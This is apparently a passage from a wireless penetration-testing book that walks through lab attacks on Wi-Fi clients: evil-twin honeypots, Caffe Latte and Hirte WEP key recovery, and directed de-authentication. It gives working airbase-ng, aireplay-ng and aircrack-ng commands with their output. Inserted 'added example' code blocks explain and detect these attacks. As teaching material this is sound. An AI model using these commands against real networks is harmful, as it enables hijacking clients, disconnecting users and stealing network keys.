1. In the previous labs, we used a client that had connected to the Wireless Lab access
point. Let us switch on the client but not the actual Wireless Lab access point. Let
us now run airodump-ng mon0 and check the output. You will very soon find the
client to be in not associated mode and probing for Wireless Lab and the other SSIDs in
its stored profiles (Vivek, as shown):


Chapter 6

CH 3 ][ Elapsed: 2 mins ][ 2011-03-23 11:17

BSSID              PWR RXQ  Beacons  #Data  ENC  CIPHER AUTH ESSID
00:1E:40:53:02:FC  -50       17     1454    WPA  TKIP   PSK  vivek
00:25:5E:17:C8:00  -71        0        4    WEP  WEP         swapnil
00:25:5E:17:C8:02  -70        0        3    OPN              <length: 0>
00:25:5E:17:C8:01  -70        0        3    OPN              <length: 0>
00:25:5E:17:C8:03  -70        0        3    OPN              <length: 0>

BSSID              STATION            Packets  Probes
(not associated)   00:16:44:19:DF:         21
(not associated)   00:24:D2:FE:7F:          5
(not associated)   90:4C:E5:30:42:          4
(not associated)   00:26:B6:11:67:          5  FinAirWifi
(not associated)   60:FB:42:D5:E4:        144  Wireless Lab,Vivek
00:1E:40:53:02:FC  C8:BC:C8:EE:12:         45  vivek
2. To understand what is happening, let's run Wireshark and start sniffing on the mon0
interface. As expected, you might see a lot of packets which are not relevant to our
analysis. Apply a Wireshark filter to display only Probe Request packets from the
client MAC you are using:


Protocol     Info
IEEE 802.11  Beacon frame, SN=25, FN=0, Flags=........C, BI=100, SSID="vivek"
IEEE 802.11  Probe Request, SN=1793, FN=0, Flags=........C, SSID=Broadcast
IEEE 802.11  Probe Request, SN=1795, FN=0, Flags=........C, SSID=Broadcast
IEEE 802.11  Beacon frame, SN=67, FN=0, Flags=........C, BI=100, SSID="vivek"
IEEE 802.11  Beacon frame, SN=89, FN=0, Flags=........C, BI=100, SSID="vivek"
IEEE 802.11  Beacon frame, SN=110, FN=0, Flags=........C, BI=100, SSID="vivek"
IEEE 802.11  Beacon frame, SN=131, FN=0, Flags=........C, BI=100, SSID="vivek"
IEEE 802.11  Beacon frame, SN=153, FN=0, Flags=........C, BI=100, SSID="vivek"
IEEE 802.11  Probe Request, SN=1798, FN=0, Flags=........C, SSID="Wireless Lab"
IEEE 802.11  Beacon frame, SN=174, FN=0, Flags=........C, BI=100, SSID="vivek"
IEEE 802.11  Probe Request, SN=1799, FN=0, Flags=........C, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1800, FN=0, Flags=........C, SSID="Wireless Lab"
IEEE 802.11  Beacon frame, SN=217, FN=0, Flags=........C, BI=100, SSID="vivek"
IEEE 802.11  Probe Request, SN=1802, FN=0, Flags=........C, SSID="Wireless Lab"
IEEE 802.11  Beacon frame, SN=238, FN=0, Flags=........C, BI=100, SSID="vivek"



3. In my case, the filter would be wlan.fc.type_subtype == 0x04 && wlan.sa ==
60:FB:42:D5:E4:01. You should now see Probe Request packets only from the client,
for the SSIDs Vivek and Wireless Lab:





Protocol     Info
IEEE 802.11  Probe Request, SN=1795, SSID=Broadcast
IEEE 802.11  Probe Request, SN=1798, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1799, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1800, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1802, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1806, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1809, SSID="Vivek"
IEEE 802.11  Probe Request, SN=1811, SSID="Vivek"
IEEE 802.11  Probe Request, SN=1812, SSID="Vivek"
IEEE 802.11  Probe Request, SN=1813, SSID="Vivek"
IEEE 802.11  Probe Request, SN=1819, SSID="Vivek"
IEEE 802.11  Probe Request, SN=1820, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1822, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1824, SSID="Wireless Lab"
IEEE 802.11  Probe Request, SN=1830, SSID="Wireless Lab"





4. Let us now start a fake access point for the network Wireless Lab on the hacker 
machine using the command shown next: 


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 mon0
12:47:59  Created tap interface at0
12:47:59  Trying to set MTU on at0 to 1500
12:47:59  Trying to set MTU on mon0 to 1800
12:47:59  Access Point with BSSID 00:C0:CA:3E:BD:93 started.



5. Within a minute or so, the client connects to us automatically. This shows how
easy it is to lure un-associated clients.


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 mon0
Created tap interface at0
Trying to set MTU on at0 to 1500
Trying to set MTU on mon0 to 1800
Access Point with BSSID 00:C0:CA:3E:BD:93 started.
Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Wireless Lab"





6. Now, we will try the second case, which is creating a fake access point Wireless Lab
in the presence of the legitimate one. Let us turn our access point on to ensure that
Wireless Lab is available to the client. For this experiment, we have set the access
point channel to 3. Let the client connect to the access point. We can verify this
from the airodump-ng screen as shown next:


CH 3 ][ Elapsed: 40 s ][ 2011-03-23 12:56

BSSID              PWR RXQ  Beacons  ENC  CIPHER AUTH ESSID
00:21:91:D2:8E:25  -27 100      379  . OPN              Wireless Lab
00:1E:40:53:02:FC  -47  87      387    WPA  TKIP   PSK  vivek
00:25:5E:17:C8:01  -69   0             OPN              <length: 0>
00:25:5E:17:C8:00  -70   1             WEP  WEP         swapnil
00:25:5E:17:C8:03  -70   0             OPN              <length: 0>

BSSID              STATION            Rate     Lost  Packets  Probes
(not associated)   ...                                     4
(not associated)   ...                                     3
(not associated)   00:26:5E:17:AA:93              30       40  brindavan
(not associated)   00:24:D6:2C:D3:40                        2
(not associated)   00:23:4E:3A:A3:..               0        1
00:21:91:D2:8E:25  60:FB:42:D5:E4:01  36e-24e   337      329  Wireless Lab,Vivek


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 mon0
12:57:27  Created tap interface at0
12:57:27  Trying to set MTU on at0 to 1500
12:57:27  Access Point with BSSID 00:C0:CA:3E:BD:93 started.
8. Notice the client is still connected to the legitimate access point Wireless Lab:


CH 3 ][ Elapsed: 12 s ][ 2011-03-23 12:58

BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB    ENC  CIPHER AUTH ESSID
00:21:91:D2:8E:25  -21  87      131      5    0   3  54e.  OPN              Wireless Lab
00:1E:40:53:02:FC  -48  87      122      0    0   1  54    WPA  TKIP   PSK  vivek

BSSID              STATION            Rate  Lost  Packets  Probes
(not associated)   00:26:5E:17:AA:93                    6  brindavan
(not associated)   00:26:B6:11:67:E5                    2  FinAirWifi
(not associated)   00:24:D6:2C:D3:40                    1
00:21:91:D2:8E:25  60:FB:42:D5:E4:01                  171  Wireless Lab, Vivek


9. We will now send broadcast De-Authentication messages to the client on behalf of 
the legitimate access point to break their connection: 


root@bt:~# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 mon0
13:32:14  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 3
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
13:32:..  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
(the "Sending DeAuth to broadcast" line repeats for every burst sent)
10. Assuming the signal strength of our fake access point Wireless Lab is stronger than
the legitimate one's at the client, it connects to our fake access point instead of the
legitimate access point:


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 mon0
13:26:11  Created tap interface at0
13:26:11  Trying to set MTU on at0 to 1500
13:26:11  Access Point with BSSID 00:C0:CA:3E:BD:93 started.
13:33:..  Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Wireless Lab"






11. We can verify the same by looking at the airodump-ng output, which shows the new
association of the client with our fake access point:


[airodump-ng screen, 2011-03-23 13:33: two "Wireless Lab" access points are listed
(both OPN), alongside vivek and laxmi (WPA TKIP PSK), swapnil (WEP) and two hidden
<length: 0> networks. The client is now associated to the fake access point; the
remaining stations are (not associated) and probing for brindavan, Anoop and
FinAirWifi.]
What just happened?

We just created a Honeypot using the probed list from the client and also using the same
ESSID as that of neighboring access points. In the first case, the client automatically
connected to us as it was searching for the network. In the latter case, as we were closer to
the client than the real access point, our signal strength was higher, and the client connected
to us.









In the preceding exercise, what do we do if the client does not automatically connect to us? 
We would have to send a De-Authentication packet to break the legitimate client-access 
point connection and then if our signal strength is higher, the client will connect to our 
spoofed access point. Try this out by connecting a client to a legitimate access point, and 
then forcing it to connect to our Honeypot. 
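As an added example (not from the book), the probe requests that drive both Honeypot cases can be turned into a report of which stations are leaking which profile names, so their owners can prune the profiles that would mis-associate. It parses constructed tshark-style lines carrying the same fields as the Wireshark screens above; the station addresses are the lab's, the sequence numbers are made up, and the watch-list of ESSIDs is an assumption.

```python
import re
from collections import defaultdict

# Constructed tshark-style lines: "<source MAC> <subtype>, SN=<n>, FN=0, Flags=..., SSID=<...>".
# The Probe Request rows mirror the Wireshark screens in the text; the Beacon row is there
# to show that non-probe frames are dropped, as the wlan.fc.type_subtype == 0x04 filter does.
SAMPLE_FRAMES = """\
60:fb:42:d5:e4:01 Probe Request, SN=1793, FN=0, Flags=........C, SSID=Broadcast
60:fb:42:d5:e4:01 Probe Request, SN=1798, FN=0, Flags=........C, SSID="Wireless Lab"
00:1e:40:53:02:fc Beacon frame, SN=67, FN=0, Flags=........C, BI=100, SSID="vivek"
60:fb:42:d5:e4:01 Probe Request, SN=1809, FN=0, Flags=........C, SSID="Vivek"
00:26:b6:11:67:e5 Probe Request, SN=40, FN=0, Flags=........C, SSID="FinAirWifi"
00:16:44:19:df:aa Probe Request, SN=12, FN=0, Flags=........C, SSID=Broadcast
60:fb:42:d5:e4:01 Probe Request, SN=1820, FN=0, Flags=........C, SSID="Wireless Lab"
"""

PROBE_RE = re.compile(
    r'^(?P<sa>[0-9a-f:]{17})\s+Probe Request,.*?SSID=(?:"(?P<ssid>[^"]*)"|(?P<wild>Broadcast))\s*$'
)


def display_filter(station_mac):
    """The Wireshark display filter from step 3, built for one station."""
    return f"wlan.fc.type_subtype == 0x04 && wlan.sa == {station_mac}"


def probe_report(lines):
    """station -> sorted list of the SSIDs it probed for by name.

    A station that only sends wildcard (Broadcast or empty-SSID) probes is listed with
    an empty list: it is not leaking a profile name."""
    report = defaultdict(set)
    for line in lines:
        m = PROBE_RE.match(line.strip())
        if not m:
            continue                    # beacons, data, control frames: not probe requests
        report[m["sa"]]                 # register the station even if it only probes wildcard
        if m["ssid"]:                   # directed probe: the name comes from the station's profiles
            report[m["sa"]].add(m["ssid"])
    return {sa: sorted(ssids) for sa, ssids in report.items()}


def at_risk(report, watched):
    """Stations that would answer a honeypot advertising one of the watched ESSIDs."""
    return {sa: [s for s in ssids if s in watched]
            for sa, ssids in report.items()
            if any(s in watched for s in ssids)}


if __name__ == "__main__":
    rep = probe_report(SAMPLE_FRAMES.splitlines())
    for sa, ssids in rep.items():
        print(sa, ssids, "|", display_filter(sa))
    print("at risk:", at_risk(rep, {"Wireless Lab"}))
```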


Caffe Latte attack 


In the Honeypot attack, we noticed that clients will continuously probe for SSIDs they have
connected to previously. If the client had connected to an access point using WEP, operating
systems such as Windows cache and store the WEP key. The next time the client connects to
the same access point, the Windows wireless configuration manager automatically uses the
stored key.


The Caffe Latte attack was invented by me, the author of this book, and was demonstrated
at Toorcon 9, San Diego, USA. The Caffe Latte attack is a WEP attack which allows a hacker
to retrieve the WEP key of the authorized network, using just the client. The attack does not
require the client to be anywhere close to the authorized WEP network. It can crack the WEP
key using just the isolated client.


In the next exercise, we will retrieve the WEP key of a network from a client using the Caffe 
Latte attack. 


Time for action — conducting the Caffe Latte attack 


Follow these instructions to get started: 





1. Let us first set up our legitimate access point with WEP for the network Wireless Lab 
with the key ABCDEFABCDEFABCDEF12 in Hex: 


Chapter 6 

[Screenshot: access point configuration page. WIRELESS NETWORK SETTINGS: Wireless Network Name (SSID) Wireless Lab; 802.11 Mode Mixed 802.11n, 802.11g and 802.11b; Wireless Channel 2.422 GHz - CH 3; Transmission Rate Best (automatic); Channel Width 20 MHz; Visibility Status Visible. WIRELESS SECURITY MODE: Security Mode WEP; WEP Key Length 128 bit (26 hex digits); WEP Key 1 set to the key above; Default WEP Key WEPKey1; Authentication Shared Key. The page's own help text notes that 64-bit keys take 10 hex digits and 128-bit keys 26 hex digits, that a text string is converted to a hex key from its ASCII values, and that selecting WEP forces the device into legacy 802.11b/g mode.]


2. Let us connect our client to it and ensure that the connection is successful using 
airodump-ng as shown next: 


[Screenshot: airodump-ng output (CH 3, Elapsed: 0 s, 2011-03-23 14:45). The access point 00:21:91:D2:8E:25 is listed as WEP with ESSID Wireless Lab, alongside laxmi and vivek (WPA TKIP PSK) and swapnil (WEP). In the station list the client 60:FB:42:D5:E4:01 is associated to 00:21:91:D2:8E:25 with probes Wireless Lab,Vivek, while E4:EC:10:4F:AD:74 is unassociated and probing for Anoop.]

3. Let us unplug the access point and ensure the client is in the un-associated state 
and searching for the WEP network Wireless Lab: 


[Screenshot: airodump-ng output (CH 3, Elapsed: 8 s, 2011-03-23 14:46). Wireless Lab is no longer listed; only swapnil (WEP), vivek and laxmi (WPA TKIP PSK) remain. The client 60:FB:42:D5:E4:01 now shows as (not associated) with probes Wireless Lab,Vivek.]





4. Now we use airbase-ng to bring up an access point with Wireless Lab as the SSID 
with the parameters shown next: 


root@bt:~# airbase-ng -c 3 -a 00:21:91:D2:8E:25 -e "Wireless Lab" -L -W 1 mon0
14:47:12  Created tap interface at0
14:47:12  Trying to set MTU on at0 to 1500
14:47:13  Access Point with BSSID 00:21:91:D2:8E:25 started.
5. As soon as the client connects to this access point, airbase-ng starts the Caffe- 
Latte attack as shown: 


[Screenshot: the same airbase-ng session. After "Access Point with BSSID 00:21:91:D2:8E:25 started." (14:48:18) it prints repeated "Client 60:FB:42:D5:E4:01 associated (WEP) to ESSID: "Wireless Lab"" lines, then "Starting Caffe-Latte attack against 60:FB:42:D5:E4:01 at 100 pps." and "140 bytes keystream: 60:FB:42:D5:E4:01".]





6. We now start airodump-ng to collect the data packets from this access point only, 
as we did before in the WEP-cracking case: 


[Screenshot: airodump-ng locked to the Honeypot (CH 11, Elapsed: 30 mins, 2011-02-06 04:01, status "140 bytes keystream: 00:21:91:D2:8E:25"). The access point 00:21:91:D2:8E:25 shows 16387 beacons and 11190 data packets, ENC WEP, CIPHER WEP, AUTH SKA, ESSID Wireless Lab; the station 60:FB:42:D5:E4:01 is associated to it with 22026 packets.]




7. We also start aircrack-ng as in the WEP-cracking exercise we did before to begin 
the cracking process. The command line would be aircrack-ng filename, where 
filename is the name of the file created by airodump-ng: 


[Screenshot: Aircrack-ng 1.0 r1645 running on the capture: "[00:00:04] Tested 331777 keys (got 11111 IVs)", followed by the key byte / byte(vote) table with no result yet.]

Once we have enough WEP encrypted packets, aircrack-ng succeeds in cracking 
the key as shown next: 

[Screenshot: Aircrack-ng 1.0 r1645: "[00:25:36] Tested 1285089 keys (got 48988 IVs)", the byte(vote) table with AB, CD, EF ... leading each key byte, and the result:
    KEY FOUND! [ AB:CD:EF:AB:CD:EF:AB:CD:EF:AB:CD:EF:12 ]
    Decrypted correctly: 100%]
What just happened?
We were successful in retrieving the WEP key from just the wireless client without requiring 
an actual access point to be used or present in the vicinity. This is the power of the Caffe 
Latte attack. 





The attack works by bit flipping and replaying ARP packets sent by the wireless client after 
it associates with the fake access point we created. These bit-flipped ARP Request packets 
cause the wireless client to send more ARP response packets. Note that all these 
packets are encrypted using the WEP key stored on the client. Once we are able to gather a 
large number of these data packets, aircrack-ng is able to recover the WEP key easily. 
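The bit-flipping step described above works because WEP's integrity check value (ICV) is a plain CRC-32, which is an affine function of its input: whoever XORs a chosen difference into the encrypted payload can XOR the matching difference into the encrypted ICV without knowing the key or the keystream, and the receiver's check still passes. The following is an added example, not code from the book or from aircrack-ng. It models a WEP-style frame (IV, then payload and ICV XORed with a keystream) using a hash-based stand-in for the RC4 keystream, an assumption that does not affect the point, and contrasts it with a frame whose integrity tag is a keyed MAC (HMAC-SHA256 truncated to 8 bytes, standing in for the per-packet MIC that TKIP and CCMP add). The key, IV and ARP-like payload are constructed sample values.

```python
"""Why WEP's CRC-32 ICV does not detect bit flipping, and why a keyed MIC does.

Added example for this section; not code from the book or from aircrack-ng.
KEY, IV and ARP_LIKE are constructed sample values. keystream() is a hash-based
stand-in for RC4 output (assumption: the cipher is irrelevant to the point,
only the linearity of the CRC matters).
"""
import hashlib
import hmac
import zlib

KEY = bytes.fromhex("ABCDEFABCDEFABCDEFABCDEF12")   # the 104-bit lab key from this exercise
IV = b"\x01\x02\x03"                                 # constructed 24-bit WEP IV
ARP_LIKE = b"who-has 192.168.0.1 tell 192.168.0.2"   # constructed stand-in for an ARP request body
MIC_LEN = 8                                          # TKIP/CCMP use an 8-byte MIC


def keystream(seed, length):
    """Deterministic stand-in for the RC4 keystream (not RC4)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def crc_icv(data):
    return zlib.crc32(data).to_bytes(4, "little")    # WEP stores the ICV little-endian


def crc_is_affine(a, b):
    """crc(a ^ b) == crc(a) ^ crc(b) ^ crc(0...0) for equal-length inputs."""
    zeros = bytes(len(a))
    return zlib.crc32(xor_bytes(a, b)) == zlib.crc32(a) ^ zlib.crc32(b) ^ zlib.crc32(zeros)


def wep_like_encrypt(iv, key, payload):
    body = payload + crc_icv(payload)
    return iv + xor_bytes(body, keystream(iv + key, len(body)))


def wep_like_decrypt(key, frame):
    """Return (payload, icv_ok) as a WEP receiver would compute them."""
    iv, body = frame[:3], frame[3:]
    plain = xor_bytes(body, keystream(iv + key, len(body)))
    payload, icv = plain[:-4], plain[-4:]
    return payload, crc_icv(payload) == icv


def modify_without_key(frame, delta):
    """XOR `delta` into the encrypted payload and correct the encrypted ICV.
    Only `delta` and the frame length are used: the affine property of CRC-32
    makes the ICV correction computable without the key or keystream."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    icv_fix = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor_bytes(body[:n], delta) + xor_bytes(body[n:], icv_fix)


def mic_frame_encrypt(iv, key, payload):
    """Same construction, but the tag is a keyed MAC over IV and payload."""
    mic = hmac.new(key, iv + payload, hashlib.sha256).digest()[:MIC_LEN]
    body = payload + mic
    return iv + xor_bytes(body, keystream(iv + key, len(body)))


def mic_frame_decrypt(key, frame):
    iv, body = frame[:3], frame[3:]
    plain = xor_bytes(body, keystream(iv + key, len(body)))
    payload, mic = plain[:-MIC_LEN], plain[-MIC_LEN:]
    expected = hmac.new(key, iv + payload, hashlib.sha256).digest()[:MIC_LEN]
    return payload, hmac.compare_digest(expected, mic)


def run_demo():
    """Apply the same bit flip to a CRC-protected and a MIC-protected frame."""
    target = ARP_LIKE.replace(b"tell 192.168.0.2", b"tell 192.168.0.7")
    delta = xor_bytes(ARP_LIKE, target)              # same length, so a plain XOR difference
    tampered_wep = modify_without_key(wep_like_encrypt(IV, KEY, ARP_LIKE), delta)
    wep_payload, wep_ok = wep_like_decrypt(KEY, tampered_wep)
    mic_frame = mic_frame_encrypt(IV, KEY, ARP_LIKE)
    iv, body = mic_frame[:3], mic_frame[3:]
    n = len(body) - MIC_LEN
    tampered_mic = iv + xor_bytes(body[:n], delta) + body[n:]   # no key, so no way to fix the MIC
    mic_payload, mic_ok = mic_frame_decrypt(KEY, tampered_mic)
    return {"crc_affine": crc_is_affine(ARP_LIKE, delta),
            "wep_payload_after_flip": wep_payload, "wep_icv_check_after_flip": wep_ok,
            "mic_payload_after_flip": mic_payload, "mic_check_after_flip": mic_ok}


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

The CRC-protected frame decrypts to the altered address and still passes the ICV check, while the MIC-protected frame decrypts to the same altered bytes but fails verification: a linear checksum only detects accidental corruption, and an integrity tag that resists deliberate modification has to depend on a key. That is the design change WPA made with its per-packet MIC, which is why the packet-injection techniques of this chapter are confined to WEP.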


Try changing the WEP key and repeat the attack. This is a difficult attack and requires some 
practice to orchestrate successfully. It would also be a good idea to use Wireshark and 
examine the traffic on the wireless network. 


We have seen the De-Authentication attack in previous chapters as well, in the context of the 
access point. In this chapter, we will explore the same in the context of the client. 


In the next lab, we will send De-Authentication packets to just the client and break an 
established connection between the access point and the client. 





Time for action - De-Authenticating the client 


Follow the instructions to get started: 


1. Let us first bring our access point Wireless Lab online again. Let us keep it running 
on WEP to prove that even with encryption enabled it is possible to attack the 
access point and client connection. Let us verify that the access point is up by using 
airodump-ng: 


[Screenshot: airodump-ng output (CH 3, Elapsed: 32 s, 2011-03-24 09:55). The access point 00:21:91:D2:8E:25 is up with 291 beacons, ENC WEP, CIPHER WEP, ESSID Wireless Lab; the station list contains only unassociated clients, one of them probing for vivek.]







2. Let us connect our client to this access point and verify it with airodump-ng: 


[Screenshot: airodump-ng output (CH 3, Elapsed: 24 s, 2011-03-24 10:22). Besides 00:21:91:D2:8E:25 (WEP, Wireless Lab) the list shows swapnil (WEP) and three hidden open networks on 00:25:5E:17:C8:01 to 03. The station 60:FB:42:D5:E4:01 is now associated to 00:21:91:D2:8E:25 (PWR -16, 247 packets, probes Wireless Lab,Vivek).]





3. We will now run aireplay-ng to target the client and access point connection: 


root@bt:~# aireplay-ng --deauth 1 -c 60:FB:42:D5:E4:01 -a 00:21:91:D2:8E:25 mon0
10:27:19  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 3
10:27:20  Sending 64 directed DeAuth. STMAC: [60:FB:42:D5:E4:01] [32|65 ACKs]
root@bt:~#











4. The client gets disconnected and tries to reconnect to the access point; we can 
verify this by using Wireshark just as before: 


[Screenshot: Wireshark capturing on mon0 with the display filter wlan.addr == 60:fb:42:d5:e4:01. The packet list is a burst of IEEE 802.11 Deauthentication frames exchanged between D-Link_d2:8e:25 (00:21:91:d2:8e:25) and Apple_d5:e4:01 (60:fb:42:d5:e4:01) with sequence numbers climbing from 108 to 117, interrupted by a Probe Request from the client to Broadcast and a Probe Response from the access point carrying SSID "Wireless Lab". The selected frame (38 bytes) decodes as a Radiotap header followed by an IEEE 802.11 Deauthentication frame, Type/Subtype 0x0c, destination Apple_d5:e4:01, source and BSS Id D-Link_d2:8e:25, fragment number 0, sequence number 0.]
5. We have now seen that even in the presence of WEP encryption, it is possible to 
De-Authenticate a client and disconnect it. The same is valid even in the presence of 
WPA/WPA2. Let us now set our access point to WPA encryption and verify the same. 


[Screenshot: access point configuration page. WIRELESS NETWORK SETTINGS unchanged (Wireless Network Name Wireless Lab, 802.11 Mode Mixed 802.11n, 802.11g and 802.11b, Wireless Channel 2.422 GHz - CH 3, Channel Width 20 MHz, Visibility Status Visible). WIRELESS SECURITY MODE: Security Mode WPA-Personal; WPA Mode WPA2 Only; Cipher Type AES; Group Key Update Interval 3600 seconds; PRE-SHARED KEY entered (an 8- to 63-character pass-phrase). The page's help text explains that WPA2 Only uses the AES (CCMP) cipher and refuses legacy WPA stations, while WPA Only uses TKIP for compatibility with older devices.]







6. Let's connect our client to the access point and ensure it is connected: 


[Screenshot: airodump-ng output (CH 3, Elapsed: 16 s, 2011-03-24 10:56). The access point 00:21:91:D2:8E:25 now shows ENC WPA2, CIPHER CCMP, AUTH PSK, ESSID Wireless Lab. The station 60:FB:42:D5:E4:01 is associated to it (PWR -8, 138 packets, probes Wireless Lab,Vivek); two other stations are unassociated.]





7. Let us now run aireplay-ng to disconnect the client from the access point: 


root@bt:~# aireplay-ng --deauth 1 -c 60:FB:42:D5:E4:01 -a 00:21:91:D2:8E:25 mon0
10:51:36  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 3
10:51:36  Sending 64 directed DeAuth. STMAC: [60:FB:42:D5:E4:01] [13|64 ACKs]
root@bt:~#





8. Using Wireshark we can once again verify that this works as well: 


[Screenshot: Wireshark on mon0, display filter wlan.addr == 60:fb:42:d5:e4:01, after the WPA2 de-authentication. The packet list (frames 198 onwards, all within about 35 ms of each other) alternates Deauthentication frames between Apple_d5:e4:01 and D-Link_d2:8e:25 with sequence numbers 5 to 16. The selected frame decodes as a Radiotap header and an IEEE 802.11 QoS Null function (No data) frame, Duration 258, BSS Id D-Link_d2:8e:25, source Apple_d5:e4:01, destination D-Link_d2:8e:25, with a correct frame check sequence.]
What just happened?
We just learnt how to disconnect a wireless client selectively from an access point using De- 
Authentication frames even in the presence of encryption schemes like WEP/WPA/WPA2. 
This was done by sending a De-Authentication packet to just the access point and client pair, 
instead of sending a broadcast De-Authentication to the entire network. 
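What aireplay-ng did in this exercise is visible on the air as a burst of directed Deauthentication frames, and because the forged frames are built by a different radio they do not continue the sequence counter of the station they claim to come from. The following added example, not code from the book or from Wireshark or aircrack-ng, runs two checks over a management-frame log: a sliding-window count of deauthentication/disassociation frames per sender and receiver pair, and a sequence-number discontinuity check that compares each deauthentication frame with the sender's most recent genuine frame. The log lines are constructed and mimic a tab-separated export of the fields frame.time_relative, wlan.sa, wlan.da, wlan.fc.type_subtype and wlan.seq; the exact formatting of a real tshark -T fields export may differ, so the parser accepts decimal or 0x-prefixed subtypes.

```python
"""Detect directed de-authentication floods and forged-frame sequence gaps.

Added example; not code from the book, Wireshark or aircrack-ng. The log is
constructed and mimics a tab-separated export of frame.time_relative, wlan.sa,
wlan.da, wlan.fc.type_subtype and wlan.seq.
"""
from collections import defaultdict, deque

DEAUTH = 0x0c            # management subtypes as encoded in wlan.fc.type_subtype
DISASSOC = 0x0a
BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "00:21:91:d2:8e:25"        # lab access point
CLIENT = "60:fb:42:d5:e4:01"    # lab client


def build_sample_log():
    """Constructed frames: normal beacons, then 64 forged deauths in each direction."""
    lines = []
    for i in range(4):                           # beacons every 102.4 ms, counter near 3050
        lines.append(f"{i * 0.1024:.6f}\t{AP}\t{BROADCAST}\t0x08\t{3050 + i}")
    for i in range(64):                          # the burst aireplay-ng reports as "64 directed DeAuth"
        lines.append(f"{7.5 + i * 0.001:.6f}\t{AP}\t{CLIENT}\t0x0c\t{108 + i}")
        lines.append(f"{7.5005 + i * 0.001:.6f}\t{CLIENT}\t{AP}\t0x0c\t{108 + i}")
    lines.append(f"7.600000\t{CLIENT}\t{BROADCAST}\t0x04\t474")    # client re-probes
    lines.append(f"7.601000\t{AP}\t{CLIENT}\t0x05\t3054")          # genuine probe response
    return lines


def parse_line(line):
    """(time, source, destination, subtype, sequence number) from one log line."""
    t, sa, da, subtype, seq = line.rstrip("\n").split("\t")
    return float(t), sa.lower(), da.lower(), int(subtype, 0), int(seq)


def detect_floods(lines, window=1.0, threshold=10):
    """{(sa, da): peak count} for pairs carrying >= threshold deauth/disassoc
    frames inside any `window`-second interval."""
    recent = defaultdict(deque)
    peak = {}
    for line in lines:
        t, sa, da, subtype, _seq = parse_line(line)
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[(sa, da)]
        q.append(t)
        while q and t - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peak[(sa, da)] = max(peak.get((sa, da), 0), len(q))
    return peak


def detect_seq_anomalies(lines, max_gap=64):
    """Count deauth/disassoc frames whose 12-bit sequence number is more than
    max_gap away from the sender's last genuine (non-deauth) frame. A frame
    forged by another radio does not continue the victim's own counter."""
    baseline = {}
    anomalies = defaultdict(int)
    for line in lines:
        _t, sa, _da, subtype, seq = parse_line(line)
        if subtype in (DEAUTH, DISASSOC):
            if sa in baseline:
                d = (seq - baseline[sa]) % 4096
                if min(d, 4096 - d) > max_gap:
                    anomalies[sa] += 1
        else:
            baseline[sa] = seq
    return dict(anomalies)


def analyze(lines):
    return {"floods": detect_floods(lines), "seq_anomalies": detect_seq_anomalies(lines)}


if __name__ == "__main__":
    for name, value in analyze(build_sample_log()).items():
        print(name, value)
```

The sequence check only fires for senders with a recent genuine frame, which is why in the sample the forged frames claiming the access point's address are flagged while those claiming the client's are not (the client's first genuine frame arrives after the burst). Both checks detect rather than prevent: what actually stops this attack is Protected Management Frames (802.11w), which authenticates deauthentication and disassociation frames so that a client discards forged ones.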








In the preceding exercise, we used a De-Authentication attack to break the connection. Try 
using a Dis-Association packet to break the established connection between a client and an 
access point. 


Hirte attack


We've already seen how to conduct the Caffe Latte attack. The Hirte attack extends the Caffe 
Latte attack using fragmentation techniques and allows for almost any packet to be used. 


More information on the Hirte attack is available on the AIRCRACK-NG website: 
http://www.aircrack-ng.org/doku.php?id=hirte. 


We will now use aircrack-ng to conduct the Hirte attack on the same client. 





Time for action - cracking WEP with the Hirte attack 


1. Create a WEP access point exactly as in the Caffe Latte attack using the airbase-ng 
tool. The only change is the -N option in place of the -L option, which launches 
the Hirte attack: 


root@bt:~# airbase-ng -c 3 -a 00:21:91:D2:8E:25 -e "Wireless Lab" -W 1 -N mon0
21:32:14  Created tap interface at0
21:32:14  Trying to set MTU on at0 to 1500
21:32:14  Trying to set MTU on mon0 to 1800
21:32:14  Access Point with BSSID 00:21:91:D2:8E:25 started.







2. Start airodump-ng in a separate window to capture packets for the Wireless 
Lab Honeypot: 


root@bt:~# airodump-ng -c 3 --bssid 00:21:91:D2:8E:25 --write Hirte mon0





3. Airodump-ng will now start monitoring this network and storing the packets in 
the Hirte-01.cap file. 


[Screenshot: airodump-ng output (CH 3, Elapsed: 16 s, 2011-06-27 21:34). The Honeypot 00:21:91:D2:8E:25 is listed with 386 beacons, 0 data packets, ENC WEP, CIPHER WEP, ESSID Wireless Lab; the station list is still empty.]





4. Once the roaming client connects to our Honeypot AP, the Hirte attack is 
automatically launched by airbase-ng: 


